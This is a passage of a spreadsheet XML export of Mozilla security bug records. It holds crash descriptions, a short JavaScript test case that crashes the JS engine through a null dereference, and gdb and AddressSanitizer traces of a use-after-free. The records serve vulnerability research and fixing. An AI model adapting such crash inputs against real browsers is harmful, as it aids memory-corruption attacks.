      </c>
      <c r="E3786" t="n">
        <v>1</v>
      </c>
      <c r="F3786" t="n">
        <v>1</v>
      </c>
      <c r="G3786" t="n">
        <v>3</v>
      </c>
      <c r="H3786" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3786" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3786" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3786" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3786" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3786" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3786" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3786" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3786" t="inlineStr">
        <is>
          <t>[ccbr][sg:critical?] or a null-deref DoS? fixed-in-tracemonkey</t>
        </is>
      </c>
      <c r="Q3786" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3786" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3786" t="inlineStr">
        <is>
          <t>mozilla2.0b6</t>
        </is>
      </c>
      <c r="T3786" t="n">
        <v>1</v>
      </c>
      <c r="U3786" t="n">
        <v>0</v>
      </c>
      <c r="V3786" t="n">
        <v>19</v>
      </c>
      <c r="W3786" t="inlineStr">
        <is>
          <t>try {
    __proto__ = Proxy.createFunction((function() {}),
    function() {})
    var x
    *
} catch(e) {}
default xml namespace = x
for (let b in [0, 0]) &lt;x/&gt;
asserts js debug shell on TM changeset e892ea041581 without -m nor -j at Assertion failure: JSVAL_TO_OBJECT(nsval)-&gt;getClass() == &amp;js_NamespaceClass, and crashes at EscapeAttributeValue
Seems to be null deref but s-s just to be safe.
Program received signal EXC_BAD_ACCESS, Could not access memory.
Reason: KERN_PROTECTION_FAILURE at address: 0x00000000
0x0013d328 in EscapeAttributeValue ()
(gdb) bt
#0  0x0013d328 in EscapeAttributeValue ()
#1  0x00140afe in ParseXMLSource ()
#2  0x00075437 in js::Execute ()
Previous frame inner to this frame (gdb could not unwind past this frame)
(gdb) x/i $eip
0x13d328 &lt;_ZL20EscapeAttributeValueP9JSContextRN2js6VectorItLm32ENS1_18ContextAllocPolicyEEEP8JSStringi+24&gt;:    mov    (%ecx),%ebp
(gdb) x/b $ecx
0x0:    Cannot access memory at address 0x0</t>
        </is>
      </c>
      <c r="X3786" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3787">
      <c r="A3787" t="n">
        <v>530880</v>
      </c>
      <c r="B3787" t="inlineStr">
        <is>
          <t>2009-11-24 12:39:06 -0800</t>
        </is>
      </c>
      <c r="C3787" t="inlineStr">
        <is>
          <t>Crashes  [@ nsIFrame::GetStyleDisplay() ]</t>
        </is>
      </c>
      <c r="D3787" t="inlineStr">
        <is>
          <t>2010-06-20 10:06:38 -0700</t>
        </is>
      </c>
      <c r="E3787" t="n">
        <v>1</v>
      </c>
      <c r="F3787" t="n">
        <v>1</v>
      </c>
      <c r="G3787" t="n">
        <v>3</v>
      </c>
      <c r="H3787" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3787" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3787" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K3787" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3787" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3787" t="inlineStr">
        <is>
          <t>Windows XP</t>
        </is>
      </c>
      <c r="N3787" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3787" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3787" t="inlineStr">
        <is>
          <t>[sg:critical?]</t>
        </is>
      </c>
      <c r="Q3787" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3787" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3787" t="inlineStr">
        <is>
          <t>mozilla1.9.3a1</t>
        </is>
      </c>
      <c r="T3787" t="n">
        <v>1</v>
      </c>
      <c r="U3787" t="n">
        <v>0</v>
      </c>
      <c r="V3787" t="n">
        <v>31</v>
      </c>
      <c r="W3787" t="inlineStr">
        <is>
          <t>new crash on trunk and firefox 3.6 due to frame poisoning
spin off from bug 526587
#12 rank in report from 2009 11 22
https://bug526587.bugzilla.mozilla.org/attachment.cgi?id=414317&amp;t=ytKa49fedH
12. 92 0xfffffffff0dea817 Windows NT nsIFrame::GetStyleDisplay()
reports at
http://crash-stats.mozilla.com/report/index/244668c7-8d87-40de-b8c1-97bde2091123
rame  	Module  	Signature [Expand]  	Source
0 	xul.dll 	nsIFrame::GetStyleDisplay 	layout/style/nsStyleStructList.h:95
1 	xul.dll 	xul.dll@0x41cb0b 	
2 	xul.dll 	PresShell::HandleEventInternal 	layout/base/nsPresShell.cpp:6471
3 	xul.dll 	PresShell::HandlePositionedEvent 	layout/base/nsPresShell.cpp:6296
4 	xul.dll 	PresShell::HandleEvent 	layout/base/nsPresShell.cpp:6160
5 	xul.dll 	nsViewManager::HandleEvent 	view/src/nsViewManager.cpp:1222
6 	xul.dll 	nsViewManager::DispatchEvent 	view/src/nsViewManager.cpp:1201
7 	xul.dll 	HandleEvent 	view/src/nsView.cpp:167
8 	xul.dll 	nsWindow::DispatchEvent 	widget/src/windows/nsWindow.cpp:2885
9 	xul.dll 	nsWindow::DispatchWindowEvent 	widget/src/windows/nsWindow.cpp:2913
10 	xul.dll 	nsWindow::DispatchMouseEvent 	widget/src/windows/nsWindow.cpp:3288
11 	xul.dll 	ChildWindow::DispatchMouseEvent 	widget/src/windows/nsWindow.cpp:6959
sort on address for more reports
http://crash-stats.mozilla.com/report/list?product=Firefox&amp;query_search=signature&amp;query_type=exact&amp;query=&amp;date=&amp;range_value=1&amp;range_unit=weeks&amp;do_query=1&amp;signature=nsIFrame::GetStyleDisplay%28%29</t>
        </is>
      </c>
      <c r="X3787" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3788">
      <c r="A3788" t="n">
        <v>1346590</v>
      </c>
      <c r="B3788" t="inlineStr">
        <is>
          <t>2017-03-11 13:37:56 -0800</t>
        </is>
      </c>
      <c r="C3788" t="inlineStr">
        <is>
          <t>heap-use-after-free [@ GetBoolFlag]</t>
        </is>
      </c>
      <c r="D3788" t="inlineStr">
        <is>
          <t>2019-03-13 06:42:05 -0700</t>
        </is>
      </c>
      <c r="E3788" t="n">
        <v>1</v>
      </c>
      <c r="F3788" t="n">
        <v>1</v>
      </c>
      <c r="G3788" t="n">
        <v>3</v>
      </c>
      <c r="H3788" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3788" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3788" t="inlineStr">
        <is>
          <t>DOM: Core &amp; HTML</t>
        </is>
      </c>
      <c r="K3788" t="inlineStr">
        <is>
          <t>22 Branch</t>
        </is>
      </c>
      <c r="L3788" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3788" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3788" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3788" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3788" t="inlineStr">
        <is>
          <t>[adv-main55+][adv-esr52.3+][post-critsmash-triage]</t>
        </is>
      </c>
      <c r="Q3788" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3788" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3788" t="inlineStr">
        <is>
          <t>mozilla56</t>
        </is>
      </c>
      <c r="T3788" t="n">
        <v>1</v>
      </c>
      <c r="U3788" t="n">
        <v>0</v>
      </c>
      <c r="V3788" t="n">
        <v>30</v>
      </c>
      <c r="W3788" t="inlineStr">
        <is>
          <t>Created attachment 8846348
test_case.html
The attached test case takes about 10 seconds to reproduce the crash.
==20467==ERROR: AddressSanitizer: heap-use-after-free on address 0x60d00021db60 at pc 0x7ffa3b7fd2fc bp 0x7fffc19fe700 sp 0x7fffc19fe6f8
READ of size 4 at 0x60d00021db60 thread T0
    #0 0x7ffa3b7fd2fb in GetBoolFlag /home/worker/workspace/build/src/dom/base/nsINode.h:1596:12
    #1 0x7ffa3b7fd2fb in HasTextNodeDirectionalityMap /home/worker/workspace/build/src/dom/base/nsINode.h:1683
    #2 0x7ffa3b7fd2fb in RemoveElementFromMap /home/worker/workspace/build/src/dom/base/DirectionalityUtils.cpp:556
    #3 0x7ffa3b7fd2fb in mozilla::ResetDir(mozilla::dom::Element*) /home/worker/workspace/build/src/dom/base/DirectionalityUtils.cpp:1015
    #4 0x7ffa3b81307f in mozilla::dom::Element::UnbindFromTree(bool, bool) /home/worker/workspace/build/src/dom/base/Element.cpp:1880:5
    #5 0x7ffa3dbb018e in nsGenericHTMLElement::UnbindFromTree(bool, bool) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:515:3
    #6 0x7ffa3b813183 in mozilla::dom::Element::UnbindFromTree(bool, bool) /home/worker/workspace/build/src/dom/base/Element.cpp:1893:7
    #7 0x7ffa3dbb018e in nsGenericHTMLElement::UnbindFromTree(bool, bool) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:515:3
    #8 0x7ffa3b813183 in mozilla::dom::Element::UnbindFromTree(bool, bool) /home/worker/workspace/build/src/dom/base/Element.cpp:1893:7
    #9 0x7ffa3dbb018e in nsGenericHTMLElement::UnbindFromTree(bool, bool) /home/worker/workspace/build/src/dom/html/nsGenericHTMLElement.cpp:515:3
    #10 0x7ffa3db31839 in mozilla::dom::HTMLSharedElement::UnbindFromTree(bool, bool) /home/worker/workspace/build/src/dom/html/HTMLSharedElement.cpp:311:3
    #11 0x7ffa3b9df2ae in nsDocument::cycleCollection::Unlink(void*) /home/worker/workspace/build/src/dom/base/nsDocument.cpp:1892:5
    #12 0x7ffa3dbd591d in nsHTMLDocument::cycleCollection::Unlink(void*) /home/worker/workspace/build/src/dom/html/nsHTMLDocument.cpp:193:1
    #13 0x7ffa38df468f in nsCycleCollector::CollectWhite() /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3331:5
    #14 0x7ffa38df7ae0 in nsCycleCollector::Collect(ccType, js::SliceBudget&amp;, nsICycleCollectorListener*, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:3684:24
    #15 0x7ffa38dfadb2 in nsCycleCollector_collectSlice(js::SliceBudget&amp;, bool) /home/worker/workspace/build/src/xpcom/base/nsCycleCollector.cpp:4173:3
    #16 0x7ffa3bb2016d in nsJSContext::RunCycleCollectorSlice() /home/worker/workspace/build/src/dom/base/nsJSEnvironment.cpp:1488:3
    #17 0x7ffa38f615c2 in nsTimerImpl::Fire(int) /home/worker/workspace/build/src/xpcom/threads/nsTimerImpl.cpp:484:7
    #18 0x7ffa38f2f68b in nsTimerEvent::Run() /home/worker/workspace/build/src/xpcom/threads/TimerThread.cpp:288:3
    #19 0x7ffa38f531b2 in nsThread::ProcessNextEvent(bool, bool*) /home/worker/workspace/build/src/xpcom/threads/nsThread.cpp:1264:7
    #20 0x7ffa38f4fa60 in NS_ProcessNextEvent(nsIThread*, bool) /home/worker/workspace/build/src/xpcom/threads/nsThreadUtils.cpp:389:10
    #21 0x7ffa39d61cbf in mozilla::ipc::MessagePump::Run(base::MessagePump::Delegate*) /home/worker/workspace/build/src/ipc/glue/MessagePump.cpp:96:21
    #22 0x7ffa39cd38c8 in RunInternal /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:238:3
    #23 0x7ffa39cd38c8 in RunHandler /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:231
    #24 0x7ffa39cd38c8 in MessageLoop::Run() /home/worker/workspace/build/src/ipc/chromium/src/base/message_loop.cc:211
    #25 0x7ffa3f1bfbcf in nsBaseAppShell::Run() /home/worker/workspace/build/src/widget/nsBaseAppShell.cpp:156:3
    #26 0x7ffa428284b1 in nsAppStartup::Run() /home/worker/workspace/build/src/toolkit/components/startup/nsAppStartup.cpp:283:19
    #27 0x7ffa429f86cc in XREMain::XRE_mainRun() /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4476:10
    #28 0x7ffa429fa1cc in XREMain::XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4654:8
    #29 0x7ffa429fb5cc in XRE_main(int, char**, mozilla::BootstrapConfig const&amp;) /home/worker/workspace/build/src/toolkit/xre/nsAppRunner.cpp:4745:16
    #30 0x4dffaf in do_main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:236:10
    #31 0x4dffaf in main /home/worker/workspace/build/src/browser/app/nsBrowserApp.cpp:307
    #32 0x7ffa5440d82f in __libc_start_main /build/glibc-t3gR2i/glibc-2.23/csu/../csu/libc-start.c:291
    #33 0x41c3d8 in _start (/home/user/workspace/browsers/firefox_cnt/firefox+0x41c3d8)
0x60d00021db60 is located 48 bytes inside of 144-byte region [0x60d00021db30,0x60d00021dbc0)
freed by thread T0 here:
    #0 0x4b2b2b in __interceptor_free /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:38:3
    #1 0x7ffa38f6a0be in operator delete /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:218:12
    #2 0x7ffa38f6a0be in Release /home/worker/workspace/build/src/xpcom/reflect/xptinfo/ShimInterfaceInfo.cpp:462
    #3 0x7ffa38f6a0be in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:40
    #4 0x7ffa38f6a0be in Release /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:395
    #5 0x7ffa38f6a0be in ~RefPtr /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/RefPtr.h:78
    #6 0x7ffa38f6a0be in xptiInterfaceEntry::GetIIDForParamNoAlloc(unsigned short, nsXPTParamInfo const*, nsID*) /home/worker/workspace/build/src/xpcom/reflect/xptinfo/xptiInterfaceInfo.cpp:443
    #7 0x7ffa3a7dedf1 in GetInterfaceTypeFromParam /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1441:14
    #8 0x7ffa3a7dedf1 in GatherAndConvertResults /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1525
    #9 0x7ffa3a7dedf1 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1340
    #10 0x7ffa3a7dedf1 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1296
    #11 0x7ffa3a7e6427 in GetAttribute /home/worker/workspace/build/src/js/xpconnect/src/xpcprivate.h:1679:17
    #12 0x7ffa3a7e6427 in XPC_WN_GetterSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1019
    #13 0x18f0597abd98  (&lt;unknown module&gt;)
    #14 0x7ffa4328af76 in EnterIon /home/worker/workspace/build/src/js/src/jit/Ion.cpp:2898:9
    #15 0x7ffa4328af76 in js::jit::IonCannon(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/jit/Ion.cpp:2996
    #16 0x7ffa42e3f091 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:374:41
    #17 0x7ffa42e73496 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #18 0x7ffa42e74849 in InternalCall /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:493:12
    #19 0x7ffa42e74849 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512
    #20 0x7ffa42e74849 in js::CallGetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:627
    #21 0x7ffa43d8370e in CallGetter /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1832:16
    #22 0x7ffa43d8370e in GetExistingProperty&lt;js::AllowGC::CanGC&gt; /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1880
    #23 0x7ffa43d8370e in NativeGetPropertyInline&lt;js::AllowGC::CanGC&gt; /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2111
    #24 0x7ffa43d8370e in js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2145
    #25 0x7ffa42e7bdbe in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1442:12
    #26 0x7ffa42e7bdbe in GetProperty /home/worker/workspace/build/src/js/src/jsobj.h:845
    #27 0x7ffa42e7bdbe in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4307
    #28 0x7ffa43610e59 in js::jit::ComputeGetPropResult(JSContext*, js::jit::BaselineFrame*, JSOp, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jit/SharedIC.cpp:1997:18
    #29 0x7ffa435fec86 in js::jit::DoGetPropGeneric(JSContext*, js::jit::BaselineFrame*, js::jit::ICGetProp_Generic*, JS::MutableHandle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jit/SharedIC.cpp:2169:12
    #30 0x18f0596a0a3b  (&lt;unknown module&gt;)
    #31 0x621001a10d0f  (&lt;unknown module&gt;)
    #32 0x18f05969c8a5  (&lt;unknown module&gt;)
    #33 0x7ffa430c0941 in EnterBaseline(JSContext*, js::jit::EnterJitData&amp;) /home/worker/workspace/build/src/js/src/jit/BaselineJIT.cpp:160:9
    #34 0x7ffa430c015c in js::jit::EnterBaselineMethod(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/jit/BaselineJIT.cpp:200:28
    #35 0x7ffa42e3f0f0 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:384:41
    #36 0x7ffa42e73496 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #37 0x7ffa42e73b72 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #38 0x7ffa438ebd9b in js::fun_apply(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/jsfun.cpp:1269:12
    #39 0x7ffa42e7317f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #40 0x7ffa42e7317f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #41 0x7ffa42e73b72 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #42 0x7ffa43635f2c in js::jit::InvokeFunction(JSContext*, JS::Handle&lt;JSObject*&gt;, bool, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jit/VMFunctions.cpp:114:12
    #43 0x18f0596a5e9f  (&lt;unknown module&gt;)
previously allocated by thread T0 here:
    #0 0x4b2e4b in malloc /builds/slave/moz-toolchain/src/llvm/projects/compiler-rt/lib/asan/asan_malloc_linux.cc:52:3
    #1 0x4e11bd in moz_xmalloc /home/worker/workspace/build/src/memory/mozalloc/mozalloc.cpp:83:17
    #2 0x7ffa38f66bf0 in operator new /home/worker/workspace/build/src/obj-firefox/dist/include/mozilla/mozalloc.h:194:12
    #3 0x7ffa38f66bf0 in ShimInterfaceInfo::MaybeConstruct(char const*, JSContext*) /home/worker/workspace/build/src/xpcom/reflect/xptinfo/ShimInterfaceInfo.cpp:472
    #4 0x7ffa38f696d4 in xptiInterfaceEntry::GetShimForParam(unsigned short, nsXPTParamInfo const*) /home/worker/workspace/build/src/xpcom/reflect/xptinfo/xptiInterfaceInfo.cpp:382:9
    #5 0x7ffa38f69ff0 in xptiInterfaceEntry::GetIIDForParamNoAlloc(unsigned short, nsXPTParamInfo const*, nsID*) /home/worker/workspace/build/src/xpcom/reflect/xptinfo/xptiInterfaceInfo.cpp:433:42
    #6 0x7ffa3a7dedf1 in GetInterfaceTypeFromParam /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1441:14
    #7 0x7ffa3a7dedf1 in GatherAndConvertResults /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1525
    #8 0x7ffa3a7dedf1 in Call /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1340
    #9 0x7ffa3a7dedf1 in XPCWrappedNative::CallMethod(XPCCallContext&amp;, XPCWrappedNative::CallMode) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNative.cpp:1296
    #10 0x7ffa3a7e6427 in GetAttribute /home/worker/workspace/build/src/js/xpconnect/src/xpcprivate.h:1679:17
    #11 0x7ffa3a7e6427 in XPC_WN_GetterSetter(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/xpconnect/src/XPCWrappedNativeJSOps.cpp:1019
    #12 0x18f0597abd98  (&lt;unknown module&gt;)
    #13 0x7ffa4328af76 in EnterIon /home/worker/workspace/build/src/js/src/jit/Ion.cpp:2898:9
    #14 0x7ffa4328af76 in js::jit::IonCannon(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/jit/Ion.cpp:2996
    #15 0x7ffa42e3f091 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:374:41
    #16 0x7ffa42e73496 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #17 0x7ffa42e74849 in InternalCall /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:493:12
    #18 0x7ffa42e74849 in Call /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512
    #19 0x7ffa42e74849 in js::CallGetter(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:627
    #20 0x7ffa43d8370e in CallGetter /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1832:16
    #21 0x7ffa43d8370e in GetExistingProperty&lt;js::AllowGC::CanGC&gt; /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:1880
    #22 0x7ffa43d8370e in NativeGetPropertyInline&lt;js::AllowGC::CanGC&gt; /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2111
    #23 0x7ffa43d8370e in js::NativeGetProperty(JSContext*, JS::Handle&lt;js::NativeObject*&gt;, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;jsid&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/NativeObject.cpp:2145
    #24 0x7ffa42e7bdbe in GetProperty /home/worker/workspace/build/src/js/src/vm/NativeObject.h:1442:12
    #25 0x7ffa42e7bdbe in GetProperty /home/worker/workspace/build/src/js/src/jsobj.h:845
    #26 0x7ffa42e7bdbe in js::GetProperty(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:4307
    #27 0x7ffa43610e59 in js::jit::ComputeGetPropResult(JSContext*, js::jit::BaselineFrame*, JSOp, JS::Handle&lt;js::PropertyName*&gt;, JS::MutableHandle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jit/SharedIC.cpp:1997:18
    #28 0x7ffa435fec86 in js::jit::DoGetPropGeneric(JSContext*, js::jit::BaselineFrame*, js::jit::ICGetProp_Generic*, JS::MutableHandle&lt;JS::Value&gt;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jit/SharedIC.cpp:2169:12
    #29 0x18f0596a0a3b  (&lt;unknown module&gt;)
    #30 0x621001a10d0f  (&lt;unknown module&gt;)
    #31 0x18f05969c8a5  (&lt;unknown module&gt;)
    #32 0x7ffa430c0941 in EnterBaseline(JSContext*, js::jit::EnterJitData&amp;) /home/worker/workspace/build/src/js/src/jit/BaselineJIT.cpp:160:9
    #33 0x7ffa430c015c in js::jit::EnterBaselineMethod(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/jit/BaselineJIT.cpp:200:28
    #34 0x7ffa42e3f0f0 in js::RunScript(JSContext*, js::RunState&amp;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:384:41
    #35 0x7ffa42e73496 in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:466:15
    #36 0x7ffa42e73b72 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #37 0x7ffa438ebd9b in js::fun_apply(JSContext*, unsigned int, JS::Value*) /home/worker/workspace/build/src/js/src/jsfun.cpp:1269:12
    #38 0x7ffa42e7317f in CallJSNative /home/worker/workspace/build/src/js/src/jscntxtinlines.h:282:15
    #39 0x7ffa42e7317f in js::InternalCallOrConstruct(JSContext*, JS::CallArgs const&amp;, js::MaybeConstruct) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:448
    #40 0x7ffa42e73b72 in js::Call(JSContext*, JS::Handle&lt;JS::Value&gt;, JS::Handle&lt;JS::Value&gt;, js::AnyInvokeArgs const&amp;, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/vm/Interpreter.cpp:512:10
    #41 0x7ffa43635f2c in js::jit::InvokeFunction(JSContext*, JS::Handle&lt;JSObject*&gt;, bool, unsigned int, JS::Value*, JS::MutableHandle&lt;JS::Value&gt;) /home/worker/workspace/build/src/js/src/jit/VMFunctions.cpp:114:12
    #42 0x18f0596a5e9f  (&lt;unknown module&gt;)
SUMMARY: AddressSanitizer: heap-use-after-free /home/worker/workspace/build/src/dom/base/nsINode.h:1596:12 in GetBoolFlag
Shadow bytes around the buggy address:
  0x0c1a8003bb10: fa fa fa fa fa fa fa fa fd fd fd fd fd fd fd fd
  0x0c1a8003bb20: fd fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa
  0x0c1a8003bb30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
  0x0c1a8003bb40: fa fa fa fa fa fa fa fa fa fa fa fa 00 00 00 00
  0x0c1a8003bb50: 00 00 00 00 00 00 00 00 00 00 00 00 00 fa fa fa
=&gt;0x0c1a8003bb60: fa fa fa fa fa fa fd fd fd fd fd fd[fd]fd fd fd
  0x0c1a8003bb70: fd fd fd fd fd fd fd fd fa fa fa fa fa fa fa fa
  0x0c1a8003bb80: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
  0x0c1a8003bb90: 00 fa fa fa fa fa fa fa fa fa 00 00 00 00 00 00
  0x0c1a8003bba0: 00 00 00 00 00 00 00 00 00 00 00 fa fa fa fa fa
  0x0c1a8003bbb0: fa fa fa fa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0467==ABORTING</t>
        </is>
      </c>
      <c r="X3788" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3789">
      <c r="A3789" t="n">
        <v>1147597</v>
      </c>
      <c r="B3789" t="inlineStr">
        <is>
          <t>2015-03-25 14:14:41 -0700</t>
        </is>
      </c>
      <c r="C3789" t="inlineStr">
        <is>
          <t>Privileged URLs processed by about:reader</t>
        </is>
      </c>
      <c r="D3789" t="inlineStr">
        <is>
          <t>2024-05-30 08:59:34 -0700</t>
        </is>
      </c>
      <c r="E3789" t="n">
        <v>1</v>
      </c>
      <c r="F3789" t="n">
        <v>1</v>
      </c>
      <c r="G3789" t="n">
        <v>3</v>
      </c>
      <c r="H3789" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3789" t="inlineStr">
        <is>
          <t>Toolkit</t>
        </is>
      </c>
      <c r="J3789" t="inlineStr">
        <is>
          <t>Reader Mode</t>
